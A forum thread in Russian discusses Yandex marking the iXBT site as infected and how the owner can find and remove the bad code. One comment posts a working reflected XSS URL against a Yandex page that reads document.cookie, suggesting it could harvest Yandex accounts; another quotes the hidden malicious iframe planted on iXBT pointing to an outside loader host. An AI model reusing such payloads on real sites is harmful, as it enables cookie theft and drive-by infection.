iXBT заражен, по версии Яндекса

[Joka]

help.yandex.ru/webmaster/?id=1059440#1059447

все понятно, где искать и как искать

[Terror]

Спасибо за подсказку. Странно, что на странице описания проблемы нет приведенной Вами ссылки.

[Terror]

Все, нашел, ссылка есть.

[iandrew_lis]

У самих же пассивная XSS.

yandex.ru/infected?url=http%3A%2F%2Fwww.ixbt.com%2Fdivideo%2Fdivx-specidy.shtml&return=%22%3E%3C/a%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3Ca%20href=%22

Думаю с помощью данной XSS можно много акков от Яндекса собрать.

[Davidov]

Напишите в Яндекс, пока не поздно )

[GmasteR]

тсс :)
зачем вы это написали? :D

[LMaster]

Эх, и эту нашли…

[Davidov]

Несколько лет назад обнаружил, что W3 валидатор при некотором уровне рекурсии начинал выдавать невалидный код ) Сейчас уже исправили.

[naum]

А я вас предупреждал!

[otaqsun]

В хроме можно позаходить на эту страничку: habrahabr.ru/blogs/flash/

[sterlingov]

Добрый день.

Для того, чтобы быстро понять, где искать и что удалять, стоит зарегистрировать свой сайт в Яндекс.Вебмастере — там приводятся примеры зараженных страниц. Ну вот, например, ixbt.com/comm/homepna.shtml, там есть вот такой вот iframe:

src=«http:// findbigbearproperty.cn:8080/ts/in.cgi?pepsi9» width=2 height=4 style=«visibility: hidden»

Если сайт зарегистрирован в Я.Вебмастере, владельцу приходит сообщение о том, что наша система обнаружила потенциально опасную страницу. Там же можно запросить перепроверку сайта после удаления вредоносного кода. Таким образом, за несколько часов можно все исправить, и пометка в результатах поиска снимется.